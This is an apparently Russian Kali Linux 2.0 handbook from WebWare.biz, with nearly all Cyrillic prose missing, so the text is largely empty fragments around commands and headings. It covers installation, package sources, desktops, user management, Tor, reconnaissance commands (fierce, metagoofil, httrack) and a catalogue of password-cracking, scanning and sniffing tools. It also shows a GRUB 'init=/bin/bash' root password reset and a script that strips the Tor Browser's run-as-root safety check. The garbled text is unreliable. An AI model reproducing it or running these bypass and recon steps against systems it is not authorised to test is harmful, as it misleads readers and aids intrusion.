
Kali Linux

.
, .

" (. )

." - WiKi

, ,
. ,
, .

:
WebWare.biz

2015
Kali Linux 2.0

1. Kali Linux
1. Kali Linux? 7
2. Kali Linux: 9

3. VirtualBox Kali Linux 22
2.0
4. Kali Linux 25
( )
5. 10 , 43
Kali Linux 2.0
6. VMware Kali 45
7. VPN Kali Linux 45
VPN
8. Kali Linux 52

9. Kali Linux 54
10. / ( ) Kali 63
Linux
11. root Kali Linux 66
12. GRUB Kali Linux 68
Windows 10
13. Tor Kali Linux 70
2. Kali Linux
14. Kali Linux. 1. 74

15. Kali Linux. 2. 81

16. 95
17. Offensive Security ( Kali 119
Linux)
3.
18. Kali Linux USB Wi-Fi 122
19. Wi-Fi (WPA/WPA2), pyrit cowpatty 129
Kali Linux
20. Wifi WPA/WPA2 Reaver 135
21. Reaver t6x 140

WebWare.biz 3
Kali Linux 2.0

Pixie Dust
22. WPA2/WPA Hashcat Kali Linux 145
( Wi-Fi )
23. Wifite Pixiewps 153
24. Wi-Fi : , Kali 155
Linux
25. Router Scan by StasM Kali Linux ( Wi-Fi 165
)
26. Wifi_Jammer Wifi_DoS WebSploit 168
27. - Wifi_Jammer: 172
Wi-Fi
28. - Wifi_DoS: Wi-Fi 176
4. -
29. - (DoS -) SlowHTTPTest Kali Linux: 179
slowloris, slow body slow read
30. - : DoS - Kali Linux GoldenEye 186
31. - Low Orbit Ion Cannon (LOIC) 195
32. - : DoS hping3 199
IP Kali Linux
5. -
33. WhatWeb: Kali Linux 203
34. SQL-: ( 207
1)
35. SQLMAP Kali Linux: - 219
SQL-
36. Firefox 232
37. WordPress: WPScanner Plecost 236
38. Plecost 1.0.1 240
WordPress
39. W3af Kali Linux 244
40. ZAProxy: - 248
41. Metasploit Framework Kali Linux 2.0 250
42. Metasploit Framework Kali Linux 1.1 256
43. DIRB: - 265
44. Kali Linux 271
6.


45. OpenVAS 8.0 272


46. Armitage: 275
Kali Linux
47. Linux (rootkits) 283
rkhunter
48. Linux 286
49. Linux Malware Detect (LMD) Linux 292
50. Windows? 296
7. .
51. 299

52. NMAP Linux 301
53. Nmap 310
54. - WireShark ( 310
)
55. FTP-Map: 314
FTP-
56. ZMap IPv4 45 316

8. .
57. : , 319
,
58. PW-Inspector: 325
59. THC-Hydra: 326
( )
60. - Hydra ( 334
Hydra)
61. Crunch : 343

62. BruteX: 346



Kali Linux .
WebWare.biz.
WebWare.biz : -
( ), .
, .
WebWare.biz , Kali Linux.
. .
Linux -
Linux, ,
, ,
Kali Linux.
.
-. , 30-50
, , . Kali
Linux - BackTrack
BackTrack Kali Linux.
.
. : ,
, .
,
WebWare.biz. , ,
, . ,
.
. ,
. , .
, ,
,
http://webware.biz/?page_id=27 . ,
, , http://webware.biz/?p=3327,
, .


1. Kali Linux
1. Kali Linux?
Kali Linux Linux
.
Kali Linux
Kali BackTrack Linux www.backtrack-linux.org,
Debian.
, ,
Git VCS.
300 :
, BackTrack,
,
, .
: Kali Linux, ,
. ,
Kali Linux.
Git :

, ,
.
FHS : Kali , Filesystem
Hierarchy Standard, Linux
, , ..
: Kali Linux
,

USB
.
: ,
,
.
: Kali Linux
,

.
GPG : Kali
,
.
: , ,
, , Kali
,
, .


: ,
,
Kali Linux ,
.
ARMEL ARMHF: ARM-
, ,
Kali ARM-
ARMEL ARMHF . Kali Linux ARM
, ARM
.
ARM-:
o rk3306 mk/ss808
o Raspberry Pi
o ODROID U2/X2
o Samsung Chromebook
Kali , ,
,
Linux.
Kali Linux Debian
Kali Linux
. , Kali Linux ,
:
single user, root access: , Kali Linux
single, root user.
: Kali Linux sysvinit hooks,
. hooks
Linux, ,
, ,
. , Bluetooth,
.
Linux : Kali Linux ,
.
Kali Linux ?
, , ,
Kali Linux. , Kali Linux

, , Linux.
, ,
, ,
.


2. Kali Linux:

Wi-Fi,
USB Wi-Fi .
Kali Linux USB Wi-Fi .

Kali Linux 2.x Kali Linux 1.x


Kali Linux , Linux Debian.
, , ,
. ..
,
,
- . . Kali Linux
,
WebWare.biz ,
RSS-, e-mail
.
, Kali Linux
:


, Kali Linux 64 bit ISO


Kali Linux 32 bit ISO. ,
( ).
- , Kali Linux
(
, ,
.
Kali Linux Live-
( Live-
). Kali Linux , . .
() (, ).
VirtualBox,
( ).
VirtualBox . ,
(Linux) (

). ( Debian,
. . Kali Linux ):

,
, .
, VirtualBox,
, VirtualBox :



, (
Live-,
):


.
. . .
, 30 , ,
30 , . . .
,
(, 2-3 ),
:


,
, ,
. -
, , .
10 , , :


, Kali Linux, kali-


linux-1.0.9a-amd64, , kali-linux-1.0.9a-
amd64.iso.
. -
, Kali Linux:


Live- ( ),
. Install ():

, ,
.
:


( , ):


. .
( , Enter):

Enter:

. :

, :

, :


, . . Kali Linux
:

( , -
):

.iso ,
:


'root' :

Kali Linux

.

3. VirtualBox
Kali Linux 2.0
Kali Linux VirtualBox,
.
VirtualBox 4.2.xx ,
,
, .
VirtualBox Kali Linux
VirtualBox
, .
, .
Kali Linux,
Linux.
apt-get update && apt-get install -y linux-headers-$(uname -r)
, CD-ROM
.
. ISO CD
Kali Linux.
CD, .
, CD-ROM
.
. ISO CD

Kali Linux.
CD, .

VBoxLinuxAdditions.run CD-ROM
. ,
.
cp /media/cdrom/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
cd /root
./VBoxLinuxAdditions.run


Kali Linux
. ,
.

,
Kali Linux VirtualBox VirtualBox.
VirtualBox Kali Linux
. .
, , -
.


media.
.

4. Kali Linux
( )
Linux
Kali Linux :
( ,
Wi-Fi );
(
; )
GPU Wi-Fi-
Wi-Fi-;
, ;
;
Kali Linux .
. ,
(). ,
, Windows
. ,
(). (


), ( ) , ,
. , , .
, WebWare.biz Kali Linux Live USB.
Live. .. Live .
Live , . ..
.
, ,
(Persistence) Kali
Live USB. Linux,
.
, Kali USB
.
, , Kali Linux
.
,
. ,
, .
, Linux! ..
Mint, Ubuntu -,
.
Linux USB--

VirtualBox.
. Linux
, . , ,
. , , VirtualBox.
. ,
, Linux. , , , , Debian (64 bit).
64- ,
.

. , , 1 .
.


, :

, .
.
. Kali Linux .
, !


. Kali Linux :


, (
). . , Kali Linux
. ,
. , USB-
( ) .
Linux Mint. :
, VirtualBox . ..
. :
USB 3 USB 2. VirtualBox 5
USB 3 ( ). ,
.
( - ) Linux
. ,
. .. - , -.
, ,
, :


Kali Graphical install.

. , .
,
Kali.


. USB 3,
.


- :


.
, .
. .
Kali Linux
Windows , ,
. Delete Esc
(
). , .
, . ,
USB 3, .
USB 2.
Windows ( ),
Microsoft UEFI.
, ( ,
?).
(
):
shutdown.exe /r /o
,
. :


UEFI:


, -.
, . Boot,
Boot Option Priorities, :


.
Secure Boot (Disable):

OS Mode Selection. CMS and UEFI OS.


CMS OS, Windows .


Fast BIOS Mode (Disable).


, USB :


!
. F2. Delete.
.
, .
. ,
Esc F*.
Boot Option Priorities. .
, Windows Boot
Manager, : ,
Linux . , Windows
!


VirtualBox .

Live- Linux CD (DVD)-, ,
. :
CD (DVD)- ( );
.
( Linux
), (
).
, . .
VirtualBox, :
Kali Linux Live USB
(Persistence) Kali Live
USB
Kali,
16 . 32
,
. , .
eBay.com.


5. 10 ,
Kali Linux 2.0
: https://www.offensive-security.com/kali-linux/top-10-post-install-tips/
Kali 2.0
, , ,
. ,
, 10 :

, .
.
. , .
https://www.youtube.com/watch?v=drAQVPXuXu4
SSH Kali 2.0
Kali Linux 2.0 Debian SSH,
root key ( Jessie).
root@kali:~# grep Root /etc/ssh/sshd_config
PermitRootLogin without-password
PermitRootLogin
yes SSH,
. SSH
authorized_keys.
Nvidia
NVIDIA,
NVIDIA Kali 2.0.
VMWare Virtualbox,


VMWare (Workstation
Fusion), VirtualBox.
Gnome
,
ISO.
Gnome:
https://www.youtube.com/watch?v=Ju9qdYGc9rk
Kali 2.0
- ,
Kali, sources.list
. ,
, .

,
sources.list. kali-dev, kali-rolling -
Kali, .
** ,
/etc/apt/sources.list.d/ .
-,
root
, Kali ,
root. ,
- Kali ,
( mial
):
root@kali:~# useradd -m mial -G sudo -s /bin/bash
root@kali:~# passwd mial
Enter new UNIX password:
Retype new UNIX password:
passwd: password updated successfully
root@kali:~#

Flash
.
Kali
Debian 4 . ,
Kali .
, :
apt-get update && apt-get dist-upgrade

FHS
Kali
, . Kali
, ,
( ).
Kali .
, .
Kali ,
FHS, . .
apt.


6. VMware Kali
( Kali Linux 1.1.0 Kali Linux 2.0)
VMware,
VMware,
VMware
Kali. opt open-vm-toolbox,
VMware.
open-vm-tools
, ,
VMware Kali VMware.
apt-get install open-vm-toolbox

VMware Kali
vmware-tools ,
. vmware-tool
.
cd ~
apt-get install git gcc make linux-headers-$(uname -r)
git clone https://github.com/rasa/vmware-tools-patches.git
cd vmware-tools-patches

ISO VMware, Install VMware Tools


( VMware) . ISO
VMware ,
, :
cd ~/vmware-tools-patches
cp /media/cdrom/VMwareTools-9.9.0-2304977.tar.gz downloads/
./untar-and-patch-and-compile.sh

7. VPN Kali Linux


VPN
( Kali 2.0 Kali 1.x)
VPN
VPN Kali Linux
(VPN) ,
.
,

, ,
. VPN
,
. Kali Linux, ,
VPN , . . .
,
VPN VPN Kali
Linux.
,
(, ),

(, ,
,
). .
VPN
. VPN
, . VPN
-
.
VPN ?
11 , VPN.
1. VPN IP .
2. ( WiFi)

3. .
4. .
5. !
6. ( Youtube, NetFlix
BBC Player ..)
7. .
8. /VOIP .
9. , .
10. .
11. .
, VPN .
, , , ,
, ( !),
(, Alexa, Google Toolbar . .).
VPN Kali Linux 2.0
aptitude -r install network-manager-openvpn-gnome network-manager-pptp network-manager-pptp-gnome strongswan-nm network-manager-vpnc network-manager-vpnc-gnome


VPN Wired:


(+) :

VPN:


VPN Kali Linux 1.x


VPN Kali Linux 1.x
, Kali Linux VPN . ,
, , , VPN,
- -, .
, .
,
.

,
.

VPN Kali Linux 1.x


-, .
Kali Linux.
.
, , .
.
aptitude -r install network-manager-openvpn-gnome network-manager-pptp network-manager-pptp-gnome network-manager-strongswan network-manager-vpnc network-manager-vpnc-gnome


, , aptitude of apt-get,
-r, Network-Manager.
aptitude -r install, , , ,
( , -
1969 kB, ).
, Network-Manager , aptitude .
, ?
, , ,
VPN .
, , , .
VPN Kali Linux (GNOME)
, , VPN.

,
VPN:

Kali Linux 4 VPN:


Cisco Compatible (vpnc)
IPsec/IKEv2 (strongswan)
OpenVPN

Point-to-point Tunneling Protocol (PPTP)

VPN , VPN , VPN , ,


. VPN,
, , .
, , , , ,
. ., , ,
. ,
.

8. Kali Linux

(
) Kali.
,
. ,
cat /etc/apt/sources.list
:
#
# deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150312-17:50]/ kali contrib main non-free
#deb cdrom:[Debian GNU/Linux 7.0 _Kali_ - Official Snapshot amd64 LIVE/INSTALL Binary 20150312-17:50]/ kali contrib main non-free
deb http://security.kali.org/ kali/updates main contrib non-free
deb-src http://security.kali.org/ kali/updates main contrib non-free
- , - .
, :
Kali 2.0
if grep -qE "deb http://http.kali.org/kali sana main non-free contrib" /etc/apt/sources.list && grep -qE "deb http://security.kali.org/kali-security/ sana/updates main contrib non-free" /etc/apt/sources.list; then echo -e "\n\n "; else echo -e "\n\n "; fi

Kali 1.x
if grep -qE "deb http://http.kali.org/kali kali main non-free contrib" /etc/apt/sources.list && grep -qE "deb http://security.kali.org/(|kali-security) kali/updates main contrib non-free" /etc/apt/sources.list; then echo -e "\n\n "; else echo -e "\n\n "; fi


. , :

:
Kali 2.0
echo -e "deb http://http.kali.org/kali sana main non-free contrib\ndeb http://security.kali.org/kali-security/ sana/updates main contrib non-free" > /etc/apt/sources.list

Kali 1.x
echo -e "deb http://http.kali.org/kali kali main non-free contrib\ndeb http://security.kali.org/kali-security kali/updates main contrib non-free" > /etc/apt/sources.list
, sources.list (
). .. - ,
. , .
,
Kali.
:


:
root@WebWare-Kali:~# cat /etc/apt/sources.list
deb http://http.kali.org/kali kali main non-free contrib
deb http://security.kali.org/kali-security kali/updates main contrib non-free

.
, :
apt-get update

9. Kali Linux
GNOME 3 Kali 2.0?
! , . Kali Linux 2.0
GNOME 3. Linux, ,
, :
No, I want to tell you the story of how you can take back control of your
computer.
: , ,
.
, , , . ,
GNOME 3 . ,
Kali Linux 2.0
Kali Linux 2.0, .
, - GNOME 3 - Ubuntu Linux Mint. Kali Linux
2.0 ( ) .
Linux .
( )
Kali Linux. : Cinnamon,
Xfce, KDE, LXDE, GNOME, MATE.
,
.

. , ,
. . ))
:
.
() .ISO Kali Linux.
( ),
,
.
Kali Linux 2.0! Kali Linux 1.x , ,
, MATE (

; , , -). Kali Linux 2.0


.

Linux: Cinnamon, Xfce, KDE, LXDE, GNOME, MATE
, , ,
.
. . Cinnamon.
KDE .
GNOME 2.
:
Cinnamon
, GNOME,
( Linux) ,
GNOME. Cinnamon MATE.
Linux Mint ?
MATE GNOME 2 . ..
GNOME 2, . Cinnamon, GNOME 2,
.

, .
, Cinnamon.
MATE
, MATE Cinnamon
GNOME 2.
KDE
.
: , . , ,
))
KDE , ( , )
.
Xfce
Xfce UNIX- .
,
,
, Xfce, .
LXDE
, LXDE ,
. LXDE
, .
,
/ .


:
( Cinnamon),
. ,
:
/usr/share/backgrounds/

Kali Linux Cinnamon

Cinnamon Kali Linux:


apt-get install kali-defaults kali-root-login desktop-base cinnamon
Cinnamon Kali Linux:
apt-get remove cinnamon


Kali Linux Xfce

XFCE Kali Linux.


,
goodies ().
apt-get install kali-defaults kali-root-login desktop-base xfce4 xfce4-places-plugin xfce4-goodies
XFCE Kali Linux
XFCE,
apt-get remove xfce4 xfce4-places-plugin xfce4-goodies


Kali Linux KDE

KDE Plasma Kali Linux:


apt-get install kali-defaults kali-root-login desktop-base kde-plasma-desktop
KDE Kali Linux:
apt-get install kali-defaults kali-root-login desktop-base kde-plasma-netbook
Debian Kali Linux:
apt-get install kali-defaults kali-root-login desktop-base kde-standard
KDE Full Install ( ) Kali Linux:
apt-get install kali-defaults kali-root-login desktop-base kde-full


KDE Kali Linux:


apt-get remove kde-plasma-desktop kde-plasma-netbook kde-standard

Kali Linux LXDE

LXDE Kali Linux:


apt-get install lxde-core lxde kali-defaults kali-root-login desktop-base
LXDE Kali Linux:
apt-get remove lxde-core lxde


Kali Linux GNOME

GNOME Kali Linux:

apt-get install gnome-core kali-defaults kali-root-login desktop-base

GNOME Kali Linux:

apt-get remove gnome-core


Kali Linux MATE

MATE:
apt-get install kali-defaults kali-root-login desktop-base mate-core
() MATE
mate-core :
apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment
() MATE
.


mate-core + mate-desktop-environment
:
apt-get install kali-defaults kali-root-login desktop-base mate-desktop-environment-extra
MATE Kali Linux
MATE, :
apt-get remove mate-core

Kali Linux
, ,
Kali Linux, .
, .
! ..
, .
.
.
update-alternatives --config x-session-manager

update-alternatives
update-alternatives , ,
.
Debian. ,
Perl;
Debian update-dependencies. (man)
man Debian.
, ,
. ,
.
, ,
.
, ,
.
.
, .
,
. ,
ed nvi,
/usr/bin/editor /usr/bin/nvi.
,
/usr/bin/ed, ,
.
.
, , ,
, . ,

/etc,
FHS (q.v.).
.
, .
config,
. ,
,
auto. :
man update-alternatives

10. / ( )
Kali Linux
Linux
Linux -
, .
, , ,
sudo su . Kali Linux
, .
,
Kali Linux ,
.
,
. ,
(, ) Kali Linux. Kali Linux
Debian Debian (Ubuntu,
Linux Mint).
, :
1. (. .
Could not update .ICEauthority var/lib/gdm3/.ICEauthority
ICEauthority
).
2. sudo,
. lpadmin,
Canon, HP .
3. chsh bash. , ,
Bourne Shell (sh), Bourne-Again Shell (bash), C Shell (csh) Korn shell (ksh) ...
4. , .
5. sudo,
.
6. .


Kali:
Kali
1. Google Chrome
2. Gnome (
gnome-system-tools)
3. Kali
.
.
Kali Linux:

( mial ):
useradd -m mial
(: -m ,
/home/_)

passwd mial
.
sudo (
, ,
..)
usermod -a -G sudo mial
(: -a , G /)
bash
chsh -s /bin/bash mial
(: chsh shell, -s ,
, /bin/bash)
, .

(mial)

, , .

whoami
mial@kali.
, .
,
:
groups


.
mial ( ) sudo. ,

.
!
sudo su
.
root@kali mial@kali. ,
Kali , .
whoami
whoami
. ?
Kali Linux:
. :
userdel -r mial
(: -r mial)
mial .
userdel: user mial is currently used by process 25274.
.. ID 25274 mial. ( , Gnomekeyring,
sudo su . GnomeKeyring
Debian,
. , Gnome-
Keyring. gnomekeyring
). , . .
.

,
mial.
kill -9 25274
.
(: , ,
)
.
userdel -r mial
userdel: mial (/var/mail/mial) .
(: -r mial)
? ,
mial.


, mial ,
home
ls /home
, mial .
?
su mial
, mial .

11. root Kali Linux


root Kali Linux
, .
, live-, ARM- Kali
Linux. , :
toor

Kali Linux
.
, Linux
.
toor , ( ) .
, :

'e', . ,
linux /boot/vmlinuz-3.18 ...
( ,
2 ):
single init=/bin/bash


F10 .
:

- (
):
mount -rw -o remount /
:
passwd root


, :
shutdown -h now
Kali Linux, .
GRUB.

12. GRUB Kali Linux


Windows 10
: AndreyKravets,
http://andrey.lviv.ua/blog/repair-grub-kali-linux-with-windows-10,
http://andrey.lviv.ua.
: +AndreyKravets.
! ,
GRUB Windows 10 Kali Linux.
,
. GRUB Ubuntu,
Kali. -
.
- ( )
, .
. ,
Linux, .
Linux- , Windows
.
Windows 8.1 Kali Linux.
, Windows 10 (-


) . 8.1 ,
, GRUB. Kali Linux ,
.
.
LiveCD ,
, usb .
, . Linux,
:
fdisk -l
. -
:
/dev/sda1 29 8369 66999082+ 83 Linux
/dev/sda2 * 8370 13995 45190845 7 HPFS/NTFS
/dev/sda3 13996 14593 4803435 5 Extended
, Linux /dev/sda1
(
Linux, sda1):
mount /dev/sda1 /mnt
mount --bind /dev /mnt/dev
mount --bind /dev/pts /mnt/dev/pts
mount --bind /proc /mnt/proc
mount --bind /sys /mnt/sys
chroot /mnt
grub-install /dev/sda
update-grub
exit
umount /mnt/dev/pts
umount /mnt/dev
umount /mnt/proc
umount /mnt/sys
umount /mnt
! reboot .
Windows ( ), root-
:
os-prober
update-grub


13.
Tor Kali Linux
Tor (The Onion Router)
" ". ,
,
. ,
. ( )
, , "Tor",
"TOR". .
Tor ,
, ,
, ,
. ( )
, Tor ,
, . (
Tor .) -

. , ( 10
) (
).
, , .. ,
. 2011 Tor
2500 , .
SOCKS.
.
: ,
, , . ,
"" , .
.
(Onion). .
Tor
Electronic Frontier Foundation,
.
Tor,
.
Tor
.
, VPN,
, .
Tor -,
TCP.
, , Tor.
Tor () ,
,

. Tor
.
Tor (
) - ! ,
(),
. , ,
.
100%.
Tor
(..) .
Tor ,
. ..
.
Tor () ,
Tor.
Tor
.
2002 . ,
,
,
. (
2009 .)
"" Tor Browser Kali Linux
Tor Linux,
. Kali Linux
( Tor - , Kali Linux
). ,
:
64-
(t=`curl -s https://www.torproject.org/download/download-easy.html.en#linux | grep -E -o '/dist/torbrowser/[0-9]{1}.[0-9]{1}.[0-9]{1}/tor-browser-linux64-[0-9]{1}.[0-9]{1}.[0-9]{1}_' | head -1`; t="https://www.torproject.org"$t"ru.tar.xz"; wget $t) && tar -xvf tor-browser-linux64-* && sed -i 's/u`" -eq 0/u`" -eq 1/' ./tor-browser_ru/Browser/start-tor-browser && chown -R root ./tor-browser_ru/* && ./tor-browser_ru/Browser/start-tor-browser

32-
(t=`curl -s https://www.torproject.org/download/download-easy.html.en#linux | grep -E -o '/dist/torbrowser/[0-9]{1}.[0-9]{1}.[0-9]{1}/tor-browser-linux32-[0-9]{1}.[0-9]{1}.[0-9]{1}_' | head -1`; t="https://www.torproject.org"$t"ru.tar.xz"; wget $t) && tar -xvf tor-browser-linux32-* && sed -i 's/u`" -eq 0/u`" -eq 1/' ./tor-browser_ru/Browser/start-tor-browser && chown -R root ./tor-browser_ru/* && ./tor-browser_ru/Browser/start-tor-browser


:
Tor


,

Tor
- ,
.
. ,
start-tor-browser.
https://www.torproject.org/download/download-easy.html.en#linux,
, 32- 64- (
tor-browser-linux64-4.5.3_ru.tar.xz), .
:
cd Desktop
tar -xvf tor-browser-linux64-4.5.3_ru.tar.xz

tor-browser_ru.
start-tor-browser Leafpad.
"The Tor Browser Bundle should not be run as root. Exiting.", :
if [ "`id -u`" -eq 0 ]; then

0 1, :
if [ "`id -u`" -eq 1 ]; then

.
:
cd tor-browser_ru
chown -R root *
./Browser/start-tor-browser


Tor
, Tor
, IP-
. .
IP- ,
Tor. (, http://2ip.ru Tor
https://check.torproject.org . .)
, :
wget -q -O - ip.appspot.com
IP- .
Tor .
, IP ,
. . ., ,
, .
:
,
Java- http://www.stilllistener.addr.com/checkpoint1/index.shtml
IP- ( IP) ,
http://www.anonymize.net/current-ID.phtml
http://2ip.ru/ .
http://smart-ip.net/ HTTP SOCKS Proxy
http://leader.ru/secure/who.html
. Whois!
http://ip-whois.net/
http://clientn.free-hideip.com/map/whatismyip.php
http://smart-ip.net/tools/geoip


IP-, Tor
.

2. Kali Linux
14. Kali Linux 1.1.0.

Kali Linux ,
, ,
.
Information Gathering


.
.
Vulnerability Analysis


.
, ,
( Information Gathering).
Web Applications

-.
.
, - -,
. , -
.
Password Attacks

,
( )
.


Wireless Attacks


. 802.11 ,
, aircrack, airmon .
, RFID
Bluetooth. ,
, Kali
.

Exploitation Tools

.
(Vulnerability
Assessment) .


Sniffing and Spoofing

,
, (spoofing).
VoIP

Maintaining Access

(Maintaining Access)
.

, ,
, , .


Reverse Engineering

, , (debug) .
,
, , ,
.
, , ,
.
Stress Testing

(Stress Testing)
.
,

( ).

Hardware Hacking

Android,
Android,

Forensics

(Forensics)
, .

Reporting Tools

(Reporting tools) ,
.
System Services

Kali. BeEF,
Dradis, HTTP, Metasploit, MySQL, SSH.

Kali Linux , , -,
Kali Linux,
(, ).

15. Kali Linux 1.1.0. 2.



. , -
. ,
, , ,
-, (
. .), .
, ! Kali Linux
, .
1. HTTrack -
- . ,
PHP . ,
. ,
.
Kali Linux, ,
:
apt-get install httrack

, , ,
HTTrack:
mkdir webware.biz
cd webware.biz
httrack


, , URL ( )
, WebWare.biz ,
:

1. ()
2. ()
3.
4. URL
5. URL ( )
0.
. , ,
, (*),
() , ,
, :


HTTrack ( ):

, ,
.


2. fping Nmap
ping, , . ,
ICMP . fping
.
IP
ICMP.

fping -asg network/host-bits

fping -asg 10.0.1.0/24
-a IP , -s
, -g fping , ,
,
, .
Nmap .


3. Dig DNS
:
dig <_>
:
dig webware.biz

DNS ( WebWare.biz
, ):
dig -t ns webware.biz


4. Fierce
, , WebWare.biz mail.webware.biz,
cloud.webware.biz, th.webware.biz ..
( ):
fierce -dns webware.biz
zone transfer , .

5. Maltego
: Information Gathering| DNS Analysis| Maltego
Maltego , Kali
Paterva. ,

. :


, , .


6. Nmap
Nmap . Nmap
, , ,
.
, ,
.
Nmap ,
.
Kali Zenmap. Zenmap Nmap
.
Zenmap ,
.
Zenmap,


Kali Linux | Information Gathering | Network Scanners | zenmap


,
.


7. Metagoofil
!
, , , GPS
, ,
- . ,
, .
Metagoofil , :


-d
-t (pdf,doc,xls,ppt,odp,ods,docx,xlsx,pptx)
-l ( 200)
-h ( "yes" )
-n
-o ( )
-f ,

:
metagoofil -d webware.biz -t doc,pdf -l 200 -n 50 -o applefiles -f results.htm
: ,
, , .
.
:


,
. , Information Gathering, ,
. , , .

16.
:
,
.
: https://n0where.net/best-hacking-tools/


Cain & Abel


Microsoft.
Cain & Abel

.

CacheDump, GPL, ,
CacheDump :
MSCASH.

John the Ripper ,


John the Ripper Unix ( 11
), Windows, DOS, BeOS OpenVMS.

GUI ( ) John the Ripper. FSCrack


FSCrack "" John the Ripper (JtR), .. (GUI)
JtR.

,
.
Hydra
,
.

keimpx ,
Apache License 1.1.
keimpx

SMB.

Medusa , ,
Medusa - . ,
.

Ncrack
.
Ncrack

.

Ophcrack Windows,
Ophcrack .
, .


RainbowCrack
RainbowCrack
Philippe Oechslin. .

phrasen|drescher (p|d)
.
phrasen|drescher
, API
.

LCP
LCP
Windows NT/2000/XP/2003.

Crunch ,

Crunch
. crunch
.

, .
fcrackzip . zip,
Fcrackzip
. Fcrackzip
zip.

EnumIAX -
Inter Asterisk Exchange 2 (IAX2). enumIAX
Enumiax
:
.

wyd.pl : 1.
,
Wyd . 2. -

.

Bruter Win32.

Bruter
. Bruter ,
.

SSH .
The ssh
, , ,
bruteforcer
, .

Lodowep
Lodowep - Lotus Domino.
, .


SSHatter - ,
SSH.
SSHatter

.

Amap ,
,
Amap
.
.

Dr.Morena
Dr.Morena .
.

Firewalk ,
, ()
Firewalk IP .
Firewalk TCP UDP TTL
, .

Netcat ,
, TCP/IP.
Netcat "" ,

.

Ike-scan ,
IKE ,
Ike Scan
IPSec VPN. Linux, Unix,
MacOS Windows GPL.

Nmap (Network Mapper " ")



Nmap .
,
.

Zenmap (GUI) Nmap


Zenmap Security Scanner. (Linux, Windows, Mac OS
X, BSD ..).


onesixtyone SNMP,
Onesixtyone .
B 13 .

TCP, , . SuperScan 4
SuperScan 4 SuperScan
Windows SuperScan

AutoScan-Network (
).
Autoscan
.
.

Knocker
Knocker TCP, C, ,
.

NSAT ,
,
Nsat .
(
).

PBNJ
.
OutputPBNJ .
,
.

ScanPBNJ Nmap,
. ScanPBNJ
ScanPBNJ
. ScanPBNJ IP ,
, localhost.

, Glype proxy script


/ . , proxy
glypeahead
script ,
cURL.

Unicornscan ,
Unicornscan
.


- tcp Linux.
TCP Fast Scan . /
+

Multi Threaded
TCP Port Scanner IP.
3.0 ( ).

MingSweeper ,
MingSweeper
.

Umap (UPNP Map) TCP


Umap(UPNP Map)
UPNP Internet Gateway Device(IGD) NAT.

SendIP
NTP, BGP, RIP, RIPng, TCP,
SendIP
UDP, ICMP IPv4 IPv6 .
.

Sentry
Unix. PortSentry, Logcheck/LogSentry HostSentry
PortSentry ,

.

CurrPorts
TCP/IP UDP .
CurrPorts
,
.

NScan ,
Nscan connect() .
.

NetworkActiv Port Scanner


NetworkActiv
,
Scan
LAN WAN.


Blues Port , - -.
Scanner BluesPortScan , , 32-
Windows, , .


ZMap ,

ZMap . ZMap
IPv4 45
, Ethernet.

Subdomain-bruteforcer
subdomain- Python
bruteforcer .
-.

Ircsnapshot , Python,

, ;
ircsnapshot
.
IRC .
SOCKS TOR.

Wireshark
Wireshark , ,
, .

TCP/UDP/
""
Chaosreader (tcpdump) . "" ,
telnet, FTP , HTTP (HTML, GIF, JPEG, ), SMTP ,
.

dsniff
. dsniff, filesnarf, mailsnarf, msgsnarf,
dsniff
urlsnarf, webspy
.

Ettercap -- LAN.
Ettercap ,
.

NetworkMiner
NetworkMiner (Network Forensic Analysis Tool NFAT) Windows. NetworkMiner
/
, , ,


..

RawCap ,
RawCap
Windows, .

, , ,
. SPIKE Proxy
Spike proxy

-.

Tcpdump ,
Tcpdump
.

Tcpreplay BSD
Aaron Turner UNIX ( Win32 Cygwin),
Tcpreplay
libpcap
.

Pirni ()
iPhone. Wi-FI iPhone
Pirni Sniffer
,
promiscious.

Ufasoft Snif ,
. ,
Ufasoft Snif
,
( ).

Dnsenum ,
dnsenum
.

SomarSofts DumpSec
DumpSec
Microsoft Windows NT/XP/200x.

LDAP Browser LDAP Explorer,


LDAP Browser
Win32.

NetBIOS Enumeration Utility (NBTEnum) Windows,


NBTEnum
NetBIOS .


NETBIOS
nbtscan TCP/IP ,
.

DCOM/WMI,
wmi client Samba4. RPC/DCOM
WMI Windows 2000/XP/2003.

Dnsmap, ,
Dnsmap
.

,
Dnsrecon
, SRV.

Dnstracer , (DNS)
DNS
Dnstracer
,
.

fragroute ,
fragroute
, .

hping /
hping
TCP/IP .

Scapy
.
Scapy
, , ,
.

stunnel
Stunnel SSL ( inetd)
.

tcptraceroute TCP .
traceroute(8), UDP, ICMP
tcptraceroute
ECHO TTL TTL
.


tracetcp WIN32,
TCP SYN, ICMP/UDP ,
tracetcp
,
, .

Yersinia ,
Yersinia .
.

Nemesis UNIX
Windows . Nemesis

Nemesis
(Network Intrusion Detection Systems), , IP
. , Nemesis
.

Aircrack 802.11 WEP WPA-PSK,


Aircrack-ng ,
.

Kismet 802.11 layer2,


. Kismet
Kismet ,
(raw monitoring rfmon)
802.11b, 802.11a 802.11g.

NetStumbler ,
802.11 a/b/g WLAN.
NetStumbler
,
.

AirGrab WiFi AirGrab WiFi Radar


Apple Airport WiFi (802.11b/g/n)
Radar
.

PDA
Windows .
AirMobile agent ,

.

AirRadar
AirRadar 2 .
,


iStumbler
Mac OS X,
iStumbler
AirPort, Bluetooth , Bonjour
Mac.

KisMAC , ,
/ Mac OS X.
KisMAC MacStumbler / iStumbler / NetStumbler
,
.

WirelessMon ,
WiFi ()
WirelessMon

- .

Vistumbler , AutoIT
Vista, Windows 7, and Windows 8. WiFiDB ,
Vistumbler PHP Vistumbler VS1.
GPS, kml, ,
.

WaveStumbler ,
WaveStumbler 802.11 Linux. ,
, WEP, ESSID, MAC ..

Xirrus Wi-Fi Inspector


Xirrus Wi-Fi Wi-Fi Windows XP SP2
Inspector , Vista, 7.
Wi-Fi .

AirMagnet VoFi Analyzer


--WLAN . VoFi
Analyzer WLAN
AirMagnet VoFi ,
Analyzer ,
, , QoS RF.

.


Airpwn 802.11 ()
. Airpwn
,
Airpwn
spoofed
. ,
airpwn .

WifiScanner ,
(,
. GPL.
CISCO card prism hostap
WifiScanner
wlan-ng, prism54g, Hermes/Orinoco, Atheros, Centrino,

IDS
MAC.

Bluetooth

Bluetooth Linux Mac OS X. Harald Scan


Haraldscan , MAC
Bluetooth MAC.

FTS4BT Bluetooth.
FTS4BT FTS4BT
, , , .

BlueScanner bash , Bluetooth


BlueScanner .
Bluetooth .

